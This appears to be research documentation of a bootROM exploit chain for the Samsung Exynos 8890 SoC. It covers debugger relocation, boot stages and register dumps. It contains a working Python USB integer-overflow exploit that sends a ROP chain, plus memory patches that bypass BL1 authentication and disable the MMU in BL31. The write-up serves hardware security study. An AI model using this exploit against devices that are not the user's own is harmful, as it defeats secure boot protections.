
==================
Exploit boot chain
==================
This part describes the boot chain of the ``Exynos 8890`` SoC. 

.. important::

    This is all still under development and will change.

General overview
================

Memory layout
^^^^^^^^^^^^^
Keep this overview in mind when reading through the boot chain exploit. 

.. raw:: html

   <iframe src="../_static/stack_and_functions.html" width="100%" height="1000px" frameborder="0" float='center'></iframe>

Approach
^^^^^^^^
In our initial approach, we manually booted every stage from the debugger and jumped directly back to the debugger afterwards (without using the USB protocol). The goal was to keep the debugger alive throughout the boot chain. This became very difficult after BL31: the MMU no longer allowed us to read or write most memory regions, which cut off our access to BL31 at some point during boot and cost us the debugger interface.

This is also why the project still contains some ghost code: it dates from our attempts to keep the debugger alive throughout the boot chain, which turned out not to be easily feasible.

Boot stages
^^^^^^^^^^^^^^
Get the correct payloads for the bootROM stages from Samsung firmware files, or from `Exynos8890 usbdl-recovery images/firmwares <https://github.com/ananjaser1211/exynos8890-exynos-usbdl-recovery>`_.

.. list-table:: bootrom stages
	:header-rows: 1

	* - File
	  - Strings output
	  - Likely boot stage?
	* - sboot.bin.1.bin
	  - Exynos BL1
	  - BL1
	* - sboot.bin.2.bin
	  - BL31 %s
	  - BL31
	* - sboot.bin.3.bin
	  - Unsure. Contains strings like: TOP_DIV_ACLK_MFC_600 and APOLLO_DIV_APOLLO_RUN_MONITOR
	  - BL2?
	* - sboot.bin.4.bin
	  - Contains more textual information, and references to post BL2 boot, and android information
	  - Kernel boot/BL33?
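
The "Strings output" column can be reproduced with a short script. The following is a minimal sketch, not the tooling used in this project: the helper names ``ascii_strings`` and ``guess_stage`` and the marker table are assumptions made for illustration, based only on the strings listed in the table above.

.. code-block:: python

    import re

    # Marker strings taken from the table above; the stage mapping is a guess.
    MARKERS = [
        (b"Exynos BL1", "BL1"),
        (b"BL31 %s", "BL31"),
        (b"TOP_DIV_ACLK_MFC_600", "BL2?"),
    ]

    def ascii_strings(data: bytes, min_len: int = 6) -> list:
        """Return printable ASCII runs of at least min_len bytes, like strings(1)."""
        pattern = rb"[\x20-\x7e]{%d,}" % min_len
        return re.findall(pattern, data)

    def guess_stage(data: bytes) -> str:
        """Return the stage label of the first marker found in data."""
        for marker, stage in MARKERS:
            if marker in data:
                return stage
        return "unknown"

A call such as ``guess_stage(open("sboot.bin.1.bin", "rb").read())`` would then give a first hint about which stage a file contains. A match on a single string is only an indication and should be confirmed in a disassembler.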

Gupje
^^^^^

.. note::

    `Gupje <https://git.herreweb.nl/EljakimHerrewijnen/Samsung_S7>`_ is the debugger we'll be loading onto the device and will be moving around throughout the bootchain. 

Gupje needs to be built and loaded onto the device. Throughout the exploit, we moved the debugger to different locations in device memory. This was necessary because the space we initially used was in the way of the space used by BL31 or BL2. After BL31 we lost access to the debugger, as BL2 overwrote our last available space. At some point we moved the debugger to ``0x11200000``, as we saw that this space was used by BL31. This space is executable when the MMU is off. Below are the most important settings used to build the debugger.

Here is the ``linkscript.txt`` file.

.. code:: bash

    LINKSCRIPT.txt

    debugger_storage = 0x11201200;
    debugger_stack = 0x11201000;
    debugger_entry = 0x11200000; 

    maybe_usb_setup_read = 0x00006f88;
    dwc3_ep0_start_trans = 0x0000791c;
    usb_event_handler = 0x00007bac;
    get_endpoint_recv_buffer = 0x00007a7c;
    exynos_sleep = 0x000027c8;

    g_recv_buffer = 0x11201600;
    g_data_received = 0x11201400;

And the ``symbols.ld`` file.

.. code:: bash

    SYMBOLS.ld

    MEMORY {
        ROM (rwx): ORIGIN = 0x11200000, LENGTH = 0x1000
    }

    SECTIONS
    {
        . = 0x11200000;
        .text . : {
            *(.text*)
            *(.data*)
            *(.rodata*)
        } >ROM

    }
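
The addresses in the two files can be sanity-checked against each other. The sketch below parses ``name = value;`` assignments as they appear in the link script above and reports which symbols fall inside the ``ROM`` region from ``symbols.ld``. The function names are illustrative and not part of Gupje.

.. code-block:: python

    import re

    LINKSCRIPT = """
    debugger_storage = 0x11201200;
    debugger_stack = 0x11201000;
    debugger_entry = 0x11200000;
    g_recv_buffer = 0x11201600;
    g_data_received = 0x11201400;
    """

    ROM_ORIGIN = 0x11200000  # ORIGIN from symbols.ld
    ROM_LENGTH = 0x1000      # LENGTH from symbols.ld

    def parse_symbols(text: str) -> dict:
        """Parse 'name = 0x...;' assignments into a name -> address mapping."""
        pairs = re.findall(r"(\w+)\s*=\s*(0x[0-9a-fA-F]+)\s*;", text)
        return {name: int(value, 16) for name, value in pairs}

    def in_rom(addr: int) -> bool:
        """True if addr lies in the half-open range [ORIGIN, ORIGIN + LENGTH)."""
        return ROM_ORIGIN <= addr < ROM_ORIGIN + ROM_LENGTH

    symbols = parse_symbols(LINKSCRIPT)
    inside = sorted(name for name, addr in symbols.items() if in_rom(addr))
    print(inside)

With the values above, only ``debugger_entry`` lies inside the region. ``debugger_stack`` sits at the first address after it (``0x11201000``), and the storage and USB buffers are placed above that.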

Debuggers
=========
After the initial exploitation, the goal was to fully boot the device. This brings us to the next phase: (1) loading a debugger and (2) continuing to boot the device. If we manage to keep access to the debugger throughout the boot, this gives us room to exploit the device. The debugger does, however, need to be kept 'alive' through the boot chain. The main difficulties are the location of the debugger in memory (as it gets overwritten) and the MMU being enabled after BL31.

Initial debugger
^^^^^^^^^^^^^^^^
The initial debugger is written to ``0x2069000``, with ``debugger_stack`` and ``debugger_storage`` at ``0x0206b000`` and ``0x0206d000`` respectively.

After the initial loading of the debugger, the processor state reported is (using ghidra assistant):

.. code-block:: bash
    
    root | DEBUG | 
                X0 : 0x0 | X1 : 0xffffffff | X2 : 0x20215d8 | X3 : 0x2021894 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
                X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
                X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x2000 | X20 : 0x2069000 |
                X21 : 0x0 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
                X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20219b8 | SP/X31 : 0x2020ef0

LR/X30 is the link register. It holds the address the processor will return to when the current function is done, so it is important to keep track of.
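
When comparing dumps before and after a relocation, it helps to turn the printed context into a dictionary. The following sketch assumes the ``NAME : 0xVALUE |`` layout shown above; ``parse_ctx`` is a hypothetical helper and not part of ghidra assistant.

.. code-block:: python

    import re

    def parse_ctx(dump: str) -> dict:
        """Map register names (e.g. 'X8', 'LR/X30') to integer values."""
        pairs = re.findall(r"([A-Z][A-Z0-9/]*)\s*:\s*(0x[0-9a-fA-F]+)", dump)
        return {name: int(value, 16) for name, value in pairs}

    sample = "X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20219b8 | SP/X31 : 0x2020ef0"
    regs = parse_ctx(sample)
    print(hex(regs["LR/X30"]))  # prints 0x20219b8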

Second debugger
^^^^^^^^^^^^^^^
After a cache flush, the debugger seems to be cleared as well, so the debugger is relocated to ``0x20c0000``, with _stack and _storage now at ``0x20c2000`` and ``0x20c4000`` respectively. This is done by running:

.. code-block:: python 

    self.cd.arch_dbg.state.auto_sync = False
    self.cd.arch_dbg.state.auto_sync_special = False
    self.cd.arch_dbg.state.print_ctx()
    
    def relocate_debugger():
        # Seems to be cleared upon cache clearing??
        debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
        self.cd.memwrite_region(0x020c0000, debugger_reloc)
        self.usb_write(b"FLSH") # Flush cache
        self.cd.restore_stack_and_jump(0x020c0000)
        assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
        self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
    relocate_debugger()

The processor state reported then is:

.. code-block:: bash

  root | DEBUG | 
            X0 : 0x0 | X1 : 0x1 | X2 : 0x20215d8 | X3 : 0x2021894 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
            X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
            X14 : 0xf | X15 : 0x20c4000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x2000 | X20 : 0x2069000 |
            X21 : 0x0 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
            X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20c0000 | SP/X31 : 0x2020ef0

Final debugger
^^^^^^^^^^^^^^
We searched for quite some time for a space which was both writeable and executable. After BL31, most space became unreachable, with the MMU not allowing read/write at most spaces. We tried putting the debugger in the GPU cache, and tried some other spaces visible in the dtsi files, but eventually we found a space at ``0x11200000``. This space is executable when the MMU is off. With the MMU on, we can read/write but not execute here.

Python part
^^^^^^^^^^^

.. code-block:: python

    # Setup initial debugger
    self.setup_guppy_debugger()
    self.cd.arch_dbg.state.auto_sync = False
    self.cd.arch_dbg.state.auto_sync_special = False
    logger.debug('State after setting up initial debugger')
    self.cd.arch_dbg.state.print_ctx()
    DEBUGGER_ADDR = 0x2069000  # initial debugger location

    # Relocate debugger
    debugger = open("../../dump/reloc_debugger_0x11200000.bin", "rb").read()
    self.relocate_debugger(debugger=debugger, entry=0x11200000, storage=0x11201200, g_data_received=0x11201400)
    DEBUGGER_ADDR = 0x11200000

    # Test debugger connection
    self.cd.test_connection()

Stage 1 - Initial exploit
=========================
Frederic created a payload called 'Exynos8890dump_bootrom', which uses the USB DWC3 controller (Synopsys DesignWare USB 3.0) to read and dump the bootROM. This payload was slightly modified to keep the USB connection alive (stage1.bin). Frederic's C code was reimplemented in Python.

.. code:: python

        def exploit(self, payload: bytes):
            '''
            Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload. 
            '''
            assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big"

            current_offset = TARGET_OFFSETS[self.target][0]
            xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer
            transferred = ctypes.c_int()
            
            size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6 # max_uint32 -  header(8) + data(n) + footer(2)
            #size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8
            max_payload_size = 0x100000000 - size_to_overflow
            ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) # 
            
            # Pad the payload with zero bytes up to the maximum size (502 bytes)
            payload = payload + ((max_payload_size - len(payload)) * b"\x00")
            assert len(payload) == max_payload_size, "Invalid payload. Size is wrong"
            
            # First send payload to trigger the bug
            bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
            bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
            assert res == 0, "Error triggering payload"
            assert transferred.value == len(bug_payload), "Invalid transferred size"
            current_offset += len(bug_payload) - 8  # Remove header
            
            cnt = 0
            while True:
                if current_offset + CHUNK_SIZE >= xfer_buffer_start and current_offset < xfer_buffer_start:
                    break
                self.send_empty_transfer()
                current_offset += CHUNK_SIZE
                cnt += 1
                if current_offset > 0x100000000:
                    current_offset = current_offset - 0x100000000  # wrap around like a 32-bit integer
                print(f"{cnt} {hex(current_offset)}")
            
            remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
            assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
            if remaining > BLOCK_SIZE:
                self.send_empty_transfer()
                # Send last transfer, TODO who aligns this ROM??
                current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
                cnt += 1
                print(f"{cnt} {hex(current_offset)}")
                
            # Build ROP chain.
            rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
            transferred = ctypes.c_int(0)
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
            assert res == 0, "Error sending ROP chain"
            return
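
The size arithmetic in ``exploit`` relies on 32-bit wrap-around: the announced size is chosen so that ``current_offset + size_to_overflow``, truncated to 32 bits, ends up 14 bytes past ``xfer_buffer_start``. The sketch below reproduces that arithmetic on its own. The two addresses are hypothetical placeholders, picked only so that the result matches the 502-byte limit mentioned in the docstring; the real values live in ``TARGET_OFFSETS``.

.. code-block:: python

    U32 = 0x100000000  # 2**32, one past the largest 32-bit value

    # Hypothetical values for illustration only (not taken from TARGET_OFFSETS).
    current_offset = 0x02021800
    xfer_buffer_start = 0x020215FC

    # Same expressions as in exploit(): 8 bytes of header plus 6 extra bytes.
    size_to_overflow = U32 - current_offset + xfer_buffer_start + 8 + 6
    max_payload_size = U32 - size_to_overflow

    # Where the end of the transfer lands once the addition wraps at 32 bits.
    wrapped_end = (current_offset + size_to_overflow) % U32

    print(hex(size_to_overflow), max_payload_size, hex(wrapped_end))

With these placeholder addresses the announced size is ``0xfffffe0a``, which still fits in the 32-bit size field, and the usable payload is ``current_offset - xfer_buffer_start - 14`` bytes.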

After this exploitation, we're able to send custom payloads. The first payload that is sent, sets up the debugger. In order to run the debugger, a small amount of the bootROM was reversed in order to implement send/recv functionality.

@EljakimHerrewijnen: what send/recv did you reverse? What code from the bootROM did you reverse?

Stage 2 - BL1
=============
These are the patches we applied, in order, to get BL1 to boot:

.. figure:: images/boot_chain_bl1.drawio.svg
   :align: center

   Boot chain

- Overwrite the USB return address pointer (``0x02020f60``) to jump back to the debugger. ``self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))``
- Set link register to debugger and jump into the boot USB (``0x000064e0``) function. ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR`` and then ``self.cd.restore_stack_and_jump(0x000064e0)``
- Now we can send the BL1 binary to the device. ``self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())``. At this point, we retain access to the debugger.
- To patch the authentication, we set X0 and X1 to 1, then again set the link register to the debugger, and jump into the authentication function at ``0x00012848``. ``self.cd.arch_dbg.state.X0 = 1`` and ``self.cd.arch_dbg.state.X1 = 1`` and ``self.cd.arch_dbg.state.LR = lr`` and then ``self.cd.restore_stack_and_jump(0x00012848)``
- We flush the cache ``self.usb_write(b"FLSH")`` (Frederic did this as well). 
- Now we hijack the USB download function to jump back to the debugger. ``self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR))`` and ``self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))``
- And finally, we again restore our link register to the debugger, and jump into BL1 ``self.cd.restore_stack_and_jump(0x000002c0)``


.. figure:: images/initial_boot_function.png
    :align: center

    Overview of the initial boot function in the Exynos 8890.

At this point, after loading and executing BL1, the device returns to the debugger. Normally, the device would boot into BL1, and would then wait for the next boot stage to be sent over USB. But because we hijacked the USB return address pointer, the device returns to the debugger. 

Regarding auth_bl1: Initially we thought that 0x0 indicated a verified boot state (as is plausible when reading the decompiled code in Ghidra). But after modifying BL1 in the header and contents, this value did not change.

.. note::

    Git commit 8cb5f2e1 fully boots; you can use this commit to patch BL1 only.

Stage 3 - BL31
==============

Initial boot through BL31
^^^^^^^^^^^^^^^^^^^^^^^^^
Next up is BL31, which is loaded by BL1. BL31 is written at ``0x02024000`` with the entry point at ``0x02024010``, and it ends at ``0x02048000``. ``BL31`` is the secure monitor. The monitor uses memory that is also being used by the debugger, so we have to relocate the debugger to keep code execution.

.. figure:: images/bl31_debugger_memory_example.png
   :align: center

   Example of BL31 using memory from the initial debugger.

BL31 also configures VBAR_EL3 and the MMU, so the memory mapping will probably change after this stage (preparation for TrustZone?). Here we decided to move the debugger to ``0x02048000``, as this space is still accessible after BL31, although it will get overwritten by BL2.
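
A candidate debugger address can be checked against the BL31 image range with half-open intervals. This is a small sketch under two assumptions: the end address ``0x02048000`` is treated as the first address after the image, and the debugger size of ``0x1000`` is borrowed from the ``LENGTH`` in ``symbols.ld``. The helper names are illustrative.

.. code-block:: python

    BL31_START = 0x02024000
    BL31_END = 0x02048000    # assumption: first address after the BL31 image
    DEBUGGER_SIZE = 0x1000   # assumption: LENGTH from symbols.ld

    def overlaps(start_a: int, end_a: int, start_b: int, end_b: int) -> bool:
        """True if the half-open ranges [start_a, end_a) and [start_b, end_b) intersect."""
        return start_a < end_b and start_b < end_a

    def debugger_clashes_with_bl31(addr: int) -> bool:
        """True if a debugger placed at addr would overlap the loaded BL31 image."""
        return overlaps(addr, addr + DEBUGGER_SIZE, BL31_START, BL31_END)

    print(debugger_clashes_with_bl31(0x02048000))  # prints False
    print(debugger_clashes_with_bl31(0x02047000))  # prints True

This only covers the image as loaded. Memory that BL31 uses at run time outside this range, as in the figure above, is not detected by such a check.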

At this point we switched our approach to booting the device, as we were unable to keep the debugger alive throughout the boot chain. We now boot the device normally, and then try to get our debugger after booting each stage. Because of this, we didn't need to modify a lot after BL1. Essentially all we did was:

- Set the link register to the debugger: ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR``
- Jump into our hijacked USB function: ``self.cd.restore_stack_and_jump(hijacked_fun)``
- Send BL31: ``self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())``
- Continue a function that BL1 called via the USB: ``self.cd.restore_stack_and_jump(0x2022948)``
- Jump into BL31: ``self.cd.restore_stack_and_jump(0x02024010)``

This boot process returns us to the debugger, but afterwards we are unable to access most memory regions. Notably, we tried to read TTBR0_EL3, but something prevents us from reading it. We weren't able to find any executable space that would still be available after BL2; BL2 would overwrite our debugger at this point.

Patching BL31
^^^^^^^^^^^^^
While looking for flags used for the MMU, we found a function at ``0x020244e8`` that we were able to turn off while still allowing a full boot into recovery. With this patch applied, the MMU was reported as disabled.

- get special registers: ``self.cd.arch_dbg.fetch_special_regs()``
- MMU state: ``self.cd.arch_dbg.state.R_SCTLR_EL3.mmu``

.. figure:: images/turn_off_MMU_but_good_boot_0x020244e8.png
   :align: center

   Patchable function that turns off the MMU but keeps the boot intact.

Additionally, while looking for bit flags in Ghidra, we found a space at ``0x11207010`` which seemed to be readable and writable memory. This space was not executable unless the MMU was turned off. We used this space to store our debugger; then, before booting BL31, we patched the if-statement above to disable the MMU, and booted.

- Patch if-statement to not be met: ``self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1))``
- Jump into BL31: ``self.cd.restore_stack_and_jump(0x02024010)``
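
The byte order in the patch above is worth spelling out. ``struct.pack('>I', 0x1f0c00f1)`` writes the bytes ``1f 0c 00 f1`` to memory, and since AArch64 fetches instructions as little-endian 32-bit words, the core sees the word ``0xf1000c1f``. The sketch below shows this and extracts the fields of the A64 add/subtract (immediate) encoding, which, if decoded correctly here, corresponds to ``cmp x0, #3``. Treat that reading as an assumption and confirm it in a disassembler.

.. code-block:: python

    import struct

    patch = struct.pack(">I", 0x1F0C00F1)   # bytes as written to 0x020244e8
    word = struct.unpack("<I", patch)[0]    # instruction word as fetched by the core

    # Fields of the A64 add/subtract (immediate) encoding class
    sf = (word >> 31) & 1          # 1 = 64-bit operation
    op_s = (word >> 29) & 0b11     # 0b11 = subtract and set flags (SUBS)
    imm12 = (word >> 10) & 0xFFF   # immediate operand
    rn = (word >> 5) & 0x1F        # source register number
    rd = word & 0x1F               # 31 = XZR: result discarded (CMP alias)

    print(patch.hex(), hex(word), sf, op_s, imm12, rn, rd)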

Stage 4 - BL2
=============
This is our current progress. BL2 has booted, and shows the VBARs for EL1.

.. code:: bash

    MMU is 0x0 (0x1=enabled, 0x0=disabled)
    TTBR0_EL3: 0xbc4650892f1460, TTBR1_EL2: 0xc54d39cb66f0, TTBR0_EL1: 0xa5c20fc0ac581142
    VBAR_EL3: 0x2031800, VBAR_EL2: 0x0, VBAR_EL1: 0x2053800
    TCR_EL3: 0x0, TCR_EL2: 0x80800000, TCR_EL1: 0x0
    SCTLR_EL3: 0xc5183a, SCTLR_EL2: 0x30c5083a, SCTLR_EL1: 0x30c5083a
    MAIR_EL3: 0x44e048e000098aa4, MAIR_EL2: 0x1e42bb572931240b, MAIR_EL1: 0x44e048e000098aa4
    Current EL: 0xc
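
The raw values in this dump can be decoded by hand. The following small sketch uses the architectural bit positions (``SCTLR_ELx.M`` is bit 0, ``C`` is bit 2, ``I`` is bit 12, and ``CurrentEL`` holds the exception level in bits [3:2]); the function names are illustrative.

.. code-block:: python

    def decode_sctlr(value: int) -> dict:
        """Extract the MMU and cache enable bits from an SCTLR_ELx value."""
        return {
            "mmu": bool(value & (1 << 0)),      # M: stage 1 address translation
            "dcache": bool(value & (1 << 2)),   # C: data cacheability
            "icache": bool(value & (1 << 12)),  # I: instruction cacheability
        }

    def current_el(value: int) -> int:
        """Return the exception level encoded in a CurrentEL register value."""
        return (value >> 2) & 0b11

    print(decode_sctlr(0xC5183A))  # SCTLR_EL3 from the dump
    print(current_el(0xC))         # CurrentEL from the dump

For the values above this gives the MMU bit cleared and exception level 3, consistent with the ``MMU is 0x0`` line.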